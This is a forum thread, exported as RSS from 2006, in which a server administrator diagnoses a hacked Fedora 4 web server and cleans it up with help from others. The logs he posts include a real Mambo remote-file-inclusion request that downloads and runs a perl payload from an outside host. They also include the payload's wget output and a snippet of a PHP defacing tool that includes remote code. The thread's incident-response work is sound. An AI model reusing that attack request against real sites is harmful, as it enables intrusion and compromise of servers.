<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: Fedora 4 server was hacked - cleanup help in Operating System - Linux</title>
    <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952143#M46599</link>
    <description>Here's how it seems to get in:&lt;BR /&gt;&lt;BR /&gt;193.226.18.1 - - [12/Jan/2006:09:40:09 -0800] "GET //index.php?_REQUEST[option]=com_content&amp;amp;_REQUEST[Itemid]=1&amp;amp;GLOBALS=&amp;amp;mosConfig_absolute_path=&lt;A href="http://www.fullcrew.net/cmd/tool25.dat?&amp;amp;cmd=cd%20/tmp/;lwp-download%20http://shikoe.net/mamb0files.txt;perl%20mamb0files.txt;rm%20-rf%20mamb0files.txt*" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?&amp;amp;cmd=cd%20/tmp/;lwp-download%20http://shikoe.net/mamb0files.txt;perl%20mamb0files.txt;rm%20-rf%20mamb0files.txt*&lt;/A&gt; HTTP/1.0" 200 2210&lt;BR /&gt;</description>
    <pubDate>Fri, 13 Jan 2006 10:04:09 GMT</pubDate>
    <dc:creator>Geoff Wild</dc:creator>
    <dc:date>2006-01-13T10:04:09Z</dc:date>
    <item>
      <title>Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952135#M46591</link>
      <description>Somehow - they used apache to write to /var/tmp - put in what looked like some sort of chat server.&lt;BR /&gt;&lt;BR /&gt;Cleaned that up...&lt;BR /&gt;&lt;BR /&gt;Did an up2date -u&lt;BR /&gt;&lt;BR /&gt;Now, I see some weird behavior - 2 perl processes seem to spawn - chewing up my cpu.&lt;BR /&gt;&lt;BR /&gt;Tasks: 101 total,   2 running,  97 sleeping,   0 stopped,   2 zombie&lt;BR /&gt;Cpu(s): 19.5% us,  3.2% sy,  0.0% ni, 76.6% id,  0.6% wa,  0.1% hi,  0.0% si&lt;BR /&gt;Mem:    515304k total,   437000k used,    78304k free,   135524k buffers&lt;BR /&gt;Swap:  2096440k total,        0k used,  2096440k free,   105356k cached&lt;BR /&gt;&lt;BR /&gt;  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND&lt;BR /&gt;20877 apache    25   0  5320 3684 1852 S 56.6  0.7 154:19.19 perl&lt;BR /&gt;22289 apache    25   0  5320 3684 1852 R 41.0  0.7  27:42.06 perl&lt;BR /&gt;30195 root      15   0  2008  904  704 R  3.9  0.2   0:00.02 top&lt;BR /&gt;&lt;BR /&gt;# ps -ef |grep apache&lt;BR /&gt;apache    2369  2239  0 Jan08 ?        00:01:37 /usr/sbin/httpd&lt;BR /&gt;apache    2370  2239  0 Jan08 ?        00:01:54 /usr/sbin/httpd&lt;BR /&gt;apache    2371  2239  0 Jan08 ?        00:01:44 /usr/sbin/httpd&lt;BR /&gt;apache    2372  2239  0 Jan08 ?        00:02:06 /usr/sbin/httpd&lt;BR /&gt;apache    2373  2239  0 Jan08 ?        00:01:41 /usr/sbin/httpd&lt;BR /&gt;apache    2374  2239  0 Jan08 ?        00:01:37 /usr/sbin/httpd&lt;BR /&gt;apache    2375  2239  0 Jan08 ?        00:02:09 /usr/sbin/httpd&lt;BR /&gt;apache    2376  2239  0 Jan08 ?        00:01:58 /usr/sbin/httpd&lt;BR /&gt;apache   13403  2239  0 Jan08 ?        00:01:49 /usr/sbin/httpd&lt;BR /&gt;apache   13405  2239  0 Jan08 ?        00:01:21 /usr/sbin/httpd&lt;BR /&gt;apache   17659  2239  0 Jan09 ?        00:00:50 /usr/sbin/httpd&lt;BR /&gt;apache   11115  2239  0 Jan10 ?        00:01:07 /usr/sbin/httpd&lt;BR /&gt;apache   11794  2239  0 Jan10 ?        00:01:06 /usr/sbin/httpd&lt;BR /&gt;apache    3375  2239  0 Jan11 ?        00:00:39 /usr/sbin/httpd&lt;BR /&gt;apache   20867  2369  0 10:25 ?        00:00:00 [sh] &lt;DEFUNCT&gt;&lt;BR /&gt;apache   20877     1 48 10:25 ?        02:33:59 /usr/sbin/apache/logins&lt;BR /&gt;apache   22278  2376  0 14:43 ?        00:00:00 [sh] &lt;DEFUNCT&gt;&lt;BR /&gt;apache   22289     1 46 14:44 ?        00:27:22 kotfare&lt;BR /&gt;root     30188 29992  0 15:42 pts/1    00:00:00 grep apache&lt;BR /&gt;&lt;BR /&gt;There's no such thing as /usr/sbin/apache/logins (or logins anywhere) and what is kotfare?&lt;BR /&gt;&lt;BR /&gt;I have only 1 httpd binary - restored it from old backup to be safe.&lt;BR /&gt;&lt;BR /&gt;Nothing in cron - it just seems random that this starts up....&lt;BR /&gt;&lt;BR /&gt;Any ideas?&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff&lt;/DEFUNCT&gt;&lt;/DEFUNCT&gt;</description>
      <pubDate>Thu, 12 Jan 2006 19:41:38 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952135#M46591</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-12T19:41:38Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952136#M46592</link>
      <description>As you know, an application name can change the way the process name can appear to 'ps' etc..&lt;BR /&gt;&lt;BR /&gt;Go to the source, and see what these applications actually are:&lt;BR /&gt;&lt;BR /&gt;ls -l /proc/20877&lt;BR /&gt;&lt;BR /&gt;'exe' will be a symbolic link to the actual executable.  The rest you can probably make sense of on your own.&lt;BR /&gt;&lt;BR /&gt;The two defunct-shells running as Apache are a concern, track down their source files using the above method.&lt;BR /&gt;&lt;BR /&gt;As for kotfare, I honestly don't know.  Never seen it before, and '&lt;A href="http://www.kotfare.com'" target="_blank"&gt;www.kotfare.com'&lt;/A&gt; doesn't seem to respond any more..</description>
      <pubDate>Thu, 12 Jan 2006 20:26:26 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952136#M46592</guid>
      <dc:creator>Stuart Browne</dc:creator>
      <dc:date>2006-01-12T20:26:26Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952137#M46593</link>
      <description>I should have mentioned this but, you had a look through your apache logs?&lt;BR /&gt;&lt;BR /&gt;I've not heard of any direct attacks becoming available recently to apache it's self, but you may be running a PHP/CGI/mod_perl routine on there of which does have an exploit.&lt;BR /&gt;&lt;BR /&gt;I'm not aware of any FC4 packages using '/var/tmp' as a temporary directory either, they all use just '/tmp'.</description>
      <pubDate>Thu, 12 Jan 2006 20:30:41 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952137#M46593</guid>
      <dc:creator>Stuart Browne</dc:creator>
      <dc:date>2006-01-12T20:30:41Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952138#M46594</link>
      <description>Stuart - drat - killed the processes before looking in proc - I'll have to wait to see if it happens again (plus I rebooted - as I did an up2date).&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff</description>
      <pubDate>Thu, 12 Jan 2006 20:43:37 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952138#M46594</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-12T20:43:37Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952139#M46595</link>
      <description>Geoff,&lt;BR /&gt;&lt;BR /&gt;You may not have been hacked.&lt;BR /&gt;&lt;BR /&gt;If he server was on the public Internet, you may have been the victim of the slow denial of service attack that I experienced and still see on public Internet servers.&lt;BR /&gt;&lt;BR /&gt;The signs are a lot of httpd process and tons of not found entries in the access_log&lt;BR /&gt;&lt;BR /&gt;Basically, through manipulation people are trying go get your httpd server to pretend to be a browser to either make them money or exploit other servers.&lt;BR /&gt;&lt;BR /&gt;I've had to iplement a sweep that adds this junk to the iptables firewall. This keeps the situation under control and prevents denial of service attacks.&lt;BR /&gt;&lt;BR /&gt;A look at the access_log and the error_log will tell the story.&lt;BR /&gt;&lt;BR /&gt;64.179.124.49 - - [12/Jan/2006:23:22:12 -0600] "POST &lt;A href="http://infobits.net/Search1.php" target="_blank"&gt;http://infobits.net/Search1.php&lt;/A&gt; HTTP/1.1" 404 5849&lt;BR /&gt;218.56.241.181 - - [12/Jan/2006:23:22:20 -0600] "GET &lt;A href="http://www.moneyppc.com/cgi-bin/ip.cgi" target="_blank"&gt;http://www.moneyppc.com/cgi-bin/ip.cgi&lt;/A&gt; HTTP/1.0" 404 5893&lt;BR /&gt;220.185.26.162 - - [12/Jan/2006:23:22:25 -0600] "GET &lt;A href="http://www.yoomy.com/Search1.php?ID=379&amp;amp;Q=Hosting&amp;amp;B3=Search" target="_blank"&gt;http://www.yoomy.com/Search1.php?ID=379&amp;amp;Q=Hosting&amp;amp;B3=Search&lt;/A&gt; HTTP/1.0" 404 5860&lt;BR /&gt;207.67.90.47 - - [12/Jan/2006:23:22:25 -0600] "POST &lt;A href="http://www.someclicks.com/index.php" target="_blank"&gt;http://www.someclicks.com/index.php&lt;/A&gt; HTTP/1.1" 404 5915&lt;BR /&gt;&lt;BR /&gt;As you see, this stuff is not on the local server and is relatively harmless, though it occaisionall will crash either the web server  and on one occaision the kernel.&lt;BR /&gt;&lt;BR /&gt;It could be an attempt at a buffer overflow root access.&lt;BR /&gt;&lt;BR /&gt;Most of this stuff comes from script kiddies with little ability to do anything other than annoy.&lt;BR /&gt;&lt;BR /&gt;If the system has been hacked then there will be telltale signs in the logs. Evidence of logins, and manipulation. Only the best hackers totally cover their tracks.&lt;BR /&gt;&lt;BR /&gt;If so, I'd pull the system off the net and not put it back until the OS is redone and bastille has been run on it.&lt;BR /&gt;&lt;BR /&gt;SEP</description>
      <pubDate>Fri, 13 Jan 2006 00:25:40 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952139#M46595</guid>
      <dc:creator>Steven E. Protter</dc:creator>
      <dc:date>2006-01-13T00:25:40Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952140#M46596</link>
      <description>Bingo:&lt;BR /&gt;&lt;BR /&gt;# ps -ef |grep apache&lt;BR /&gt;apache    2236  2153  0 Jan12 ?        00:00:15 /usr/sbin/httpd&lt;BR /&gt;apache    2237  2153  0 Jan12 ?        00:00:20 /usr/sbin/httpd&lt;BR /&gt;apache    2238  2153  0 Jan12 ?        00:00:18 /usr/sbin/httpd&lt;BR /&gt;apache    2239  2153  0 Jan12 ?        00:00:15 /usr/sbin/httpd&lt;BR /&gt;apache    2240  2153  0 Jan12 ?        00:00:14 /usr/sbin/httpd&lt;BR /&gt;apache    2241  2153  0 Jan12 ?        00:00:18 /usr/sbin/httpd&lt;BR /&gt;apache    2242  2153  0 Jan12 ?        00:00:16 /usr/sbin/httpd&lt;BR /&gt;apache    2243  2153  0 Jan12 ?        00:00:15 /usr/sbin/httpd&lt;BR /&gt;apache    7222  2239  0 05:51 ?        00:00:00 [sh] &lt;DEFUNCT&gt;&lt;BR /&gt;apache    7231     1 98 05:51 ?        00:48:20 kotfare&lt;BR /&gt;apache   10243     1  0 06:06 ?        00:00:01 kotfare&lt;BR /&gt;root     14887 14356  0 06:40 pts/0    00:00:00 grep apache&lt;BR /&gt;ix.met.ca: /root # ll /proc/7231&lt;BR /&gt;total 0&lt;BR /&gt;dr-xr-xr-x  2 apache apache 0 Jan 13 06:00 attr&lt;BR /&gt;-r--------  1 apache apache 0 Jan 13 06:40 auxv&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:00 cmdline&lt;BR /&gt;lrwxrwxrwx  1 apache apache 0 Jan 13 06:40 cwd -&amp;gt; /&lt;BR /&gt;-r--------  1 apache apache 0 Jan 13 06:40 environ&lt;BR /&gt;lrwxrwxrwx  1 apache apache 0 Jan 13 06:40 exe -&amp;gt; /usr/bin/perl&lt;BR /&gt;dr-x------  2 apache apache 0 Jan 13 06:00 fd&lt;BR /&gt;-rw-r--r--  1 apache apache 0 Jan 13 06:40 loginuid&lt;BR /&gt;-r--------  1 apache apache 0 Jan 13 06:40 maps&lt;BR /&gt;-rw-------  1 apache apache 0 Jan 13 06:40 mem&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:40 mounts&lt;BR /&gt;-rw-r--r--  1 apache apache 0 Jan 13 06:40 oom_adj&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:40 oom_score&lt;BR /&gt;lrwxrwxrwx  1 apache apache 0 Jan 13 06:40 root -&amp;gt; /&lt;BR /&gt;-rw-------  1 apache apache 0 Jan 13 06:40 seccomp&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:00 stat&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:39 statm&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:00 status&lt;BR /&gt;dr-xr-xr-x  3 apache apache 0 Jan 13 06:00 task&lt;BR /&gt;-r--r--r--  1 apache apache 0 Jan 13 06:40 wchan&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt; # ll /proc/10243&lt;BR /&gt;ls: /proc/10243: No such file or directory&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt;Now what?&lt;BR /&gt;&lt;/DEFUNCT&gt;</description>
      <pubDate>Fri, 13 Jan 2006 09:40:55 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952140#M46596</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-13T09:40:55Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952141#M46597</link>
      <description>WT&lt;BR /&gt;&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 102&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 103&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 104&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 105&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 106&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 107&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 109&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 110&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 111&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: showtheme in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 112&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: SERVER_SOFTWARE in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 140&lt;BR /&gt;[client 216.69.166.153] PHP Notice:  Undefined variable: SERVER_VERSION in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 140&lt;BR /&gt;--12:17:44--  &lt;A href="http://shikoe.net/mamb0file.txt" target="_blank"&gt;http://shikoe.net/mamb0file.txt&lt;/A&gt;&lt;BR /&gt;           =&amp;gt; `mamb0file.txt'&lt;BR /&gt;Resolving shikoe.net... 68.142.234.54, 68.142.234.55, 68.142.234.56, ...&lt;BR /&gt;Connecting to shikoe.net|68.142.234.54|:80... connected.&lt;BR /&gt;HTTP request sent, awaiting response... 200 OK&lt;BR /&gt;Length: 17,252 (17K) [text/plain]&lt;BR /&gt;&lt;BR /&gt;    0K .......... ......                                     100%   62.30 KB/s&lt;BR /&gt;&lt;BR /&gt;12:17:45 (62.30 KB/s) - `mamb0file.txt' saved [17252/17252]&lt;BR /&gt;&lt;BR /&gt;sh: line 0: kill: ?: arguments must be process or job IDs&lt;BR /&gt;sh: line 0: kill: R: arguments must be process or job IDs&lt;BR /&gt;sh: line 0: kill: 123:49: arguments must be process or job IDs&lt;BR /&gt;sh: line 0: kill: kotfare: arguments must be process or job IDs&lt;BR /&gt;[client 64.62.160.186] PHP Notice:  Undefined variable: ch_msg in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php&lt;/A&gt; on line 244&lt;BR /&gt;[client 64.62.160.186] PHP Fatal error:  Cannot redeclare safemode() (previously declared in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php:151)" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/HTML_toolbar.php:151)&lt;/A&gt; in &lt;A href="http://www.fullcrew.net/cmd/tool25.dat?/includes/pathway.php" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?/includes/pathway.php&lt;/A&gt; on line 151&lt;BR /&gt;</description>
      <pubDate>Fri, 13 Jan 2006 09:43:58 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952141#M46597</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-13T09:43:58Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952142#M46598</link>
      <description>Nasty stuff on that fullcrew site - I've added this to iptables:&lt;BR /&gt;&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.142.234.0/24 -j DROP&lt;BR /&gt;&lt;BR /&gt;I also downloaded HTML_toolbar.php - here's part of it:&lt;BR /&gt;&lt;BR /&gt;&lt;!--&lt;BR /&gt;Defacing Tool 2.0 by r3v3ng4ns&lt;BR /&gt;revengans@gmail.com&lt;BR /&gt;se for modificar o codigo, por favor, mantenha o nome de seus autores originais&lt;BR /&gt;e por favor, entre em contato comigo...&lt;BR /&gt;&lt;BR /&gt;ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,&lt;BR /&gt;n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tam&lt;BR /&gt;bem!!&lt;BR /&gt;--&gt;&lt;BR /&gt;&lt;BR /&gt;//The Rules&lt;BR /&gt;include("&lt;A href="http://www.fullcrew.net/cmd/therules25.dat" target="_blank"&gt;http://www.fullcrew.net/cmd/therules25.dat&lt;/A&gt;");&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt;</description>
      <pubDate>Fri, 13 Jan 2006 10:01:40 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952142#M46598</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-13T10:01:40Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952143#M46599</link>
      <description>Here's how it seems to get in:&lt;BR /&gt;&lt;BR /&gt;193.226.18.1 - - [12/Jan/2006:09:40:09 -0800] "GET //index.php?_REQUEST[option]=com_content&amp;amp;_REQUEST[Itemid]=1&amp;amp;GLOBALS=&amp;amp;mosConfig_absolute_path=&lt;A href="http://www.fullcrew.net/cmd/tool25.dat?&amp;amp;cmd=cd%20/tmp/;lwp-download%20http://shikoe.net/mamb0files.txt;perl%20mamb0files.txt;rm%20-rf%20mamb0files.txt*" target="_blank"&gt;http://www.fullcrew.net/cmd/tool25.dat?&amp;amp;cmd=cd%20/tmp/;lwp-download%20http://shikoe.net/mamb0files.txt;perl%20mamb0files.txt;rm%20-rf%20mamb0files.txt*&lt;/A&gt; HTTP/1.0" 200 2210&lt;BR /&gt;</description>
      <pubDate>Fri, 13 Jan 2006 10:04:09 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952143#M46599</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-13T10:04:09Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952144#M46600</link>
      <description>Thanks Stuart and Steven!&lt;BR /&gt;&lt;BR /&gt;BTW - this was mambo related - but it affects any php script.&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://forum.mamboserver.com/showthread.php?t=69741" target="_blank"&gt;http://forum.mamboserver.com/showthread.php?t=69741&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;There is a link in there to:&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://blog.phil-taylor.com/" target="_blank"&gt;http://blog.phil-taylor.com/&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;which offers code to add to your php.&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff</description>
      <pubDate>Fri, 13 Jan 2006 19:44:59 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952144#M46600</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-13T19:44:59Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952145#M46601</link>
      <description>Followup:&lt;BR /&gt;&lt;BR /&gt;Another great tool to install on any Apache web server:&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://www.gotroot.com/mod_security+rules" target="_blank"&gt;http://www.gotroot.com/mod_security+rules&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://www.modsecurity.org" target="_blank"&gt;http://www.modsecurity.org&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;The gotroot site has great step by step instructions.&lt;BR /&gt;&lt;BR /&gt;Basically - compiles as a module to Apache.&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff</description>
      <pubDate>Mon, 16 Jan 2006 17:04:45 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952145#M46601</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2006-01-16T17:04:45Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952146#M46602</link>
      <description>Sorry to abuse the closed thread but,&lt;BR /&gt;&lt;BR /&gt;which apxs&lt;BR /&gt;&lt;BR /&gt;Where did you get apxs? I can't find it on a RH system that I did an everything install on.&lt;BR /&gt;&lt;BR /&gt;SEP</description>
      <pubDate>Tue, 17 Jan 2006 05:56:01 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952146#M46602</guid>
      <dc:creator>Steven E. Protter</dc:creator>
      <dc:date>2006-01-17T05:56:01Z</dc:date>
    </item>
    <item>
      <title>Re: Fedora 4 server was hacked - cleanup help</title>
      <link>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952147#M46603</link>
      <description>Forget it. Found it.&lt;BR /&gt;&lt;BR /&gt;Part of:&lt;BR /&gt;httpd-devel-2.0.52-22.ent.i386.rpm&lt;BR /&gt;&lt;BR /&gt;Which requires:&lt;BR /&gt;&lt;BR /&gt;apr-0.9.4-24.5.i386.rpm&lt;BR /&gt;apr-devel-0.9.4-24.5.i386.rpm&lt;BR /&gt;apr-util-0.9.4-21.i386.rpm&lt;BR /&gt;apr-util-devel-0.9.4-21.i386.rpm&lt;BR /&gt;pcre-4.5-3.2.RHEL4.i386.rpm&lt;BR /&gt;pcre-devel-4.5-3.2.RHEL4.i386.rpm&lt;BR /&gt;&lt;BR /&gt;SEP&lt;BR /&gt;&lt;BR /&gt;</description>
      <pubDate>Tue, 17 Jan 2006 07:01:29 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/fedora-4-server-was-hacked-cleanup-help/m-p/4952147#M46603</guid>
      <dc:creator>Steven E. Protter</dc:creator>
      <dc:date>2006-01-17T07:01:29Z</dc:date>
    </item>
  </channel>
</rss>

